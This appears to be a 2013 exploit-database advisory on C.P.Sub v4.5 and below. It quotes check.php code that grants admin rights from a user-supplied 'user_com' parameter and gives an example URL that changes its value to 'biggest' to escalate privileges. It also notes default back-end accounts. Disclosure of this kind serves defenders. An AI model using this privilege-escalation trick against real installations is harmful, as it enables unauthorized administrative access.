C.P.Sub versions 4.5 and below allows for administrative access escalation by the simple tweak of a user-supplied parameter.
14729e57eccb98c1c5eea6f86f24ddce13fd2cdb43c82ac103ce384009b6a37a
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: C.P.Sub <= v4.5 Misconfiguration and Improper Authentication
# Date: 2013/6/27
# Exploit Author: Chako
# Vendor Homepage: http://www.cooltey.org/ping/php.php
# Software Download Link: http://cooltey.myweb.hinet.net/cpsub_v4.5.zip
# Version: <= v4.5
# Tested on: Windows 7
#
#
####################################################################
Improper Authentication:
==========================================
Description:
C.P.Sub <= v4.5 use "user_com=" parameter to identify if the user has admin privilege.
Therefore an attacker could simply change the value for "user_com=" parameter to gain admin privilege.
/check.php (LINE: 36-44)
--------------------------------------------------------------
if($_GET[user_com] != "")
{
$user_com = $_GET[user_com];
}elseif($_POST[user_com] != "")
{
$user_com = $_POST[user_com];
}
if($user_com == "biggest")
{
--------------------------------------------------------------
Exploit:
--------------------------------------------------------------
change
http://Example_Target/info.php?cookie=yes&user_com=second
to
http://Example_Target/info.php?cookie=yes&user_com=biggest
Misconfiguration
==========================================
There are some default accounts for C.P.Sub <= v4.5 that allows an attacker
to access back-end management page. It could lead to further attack.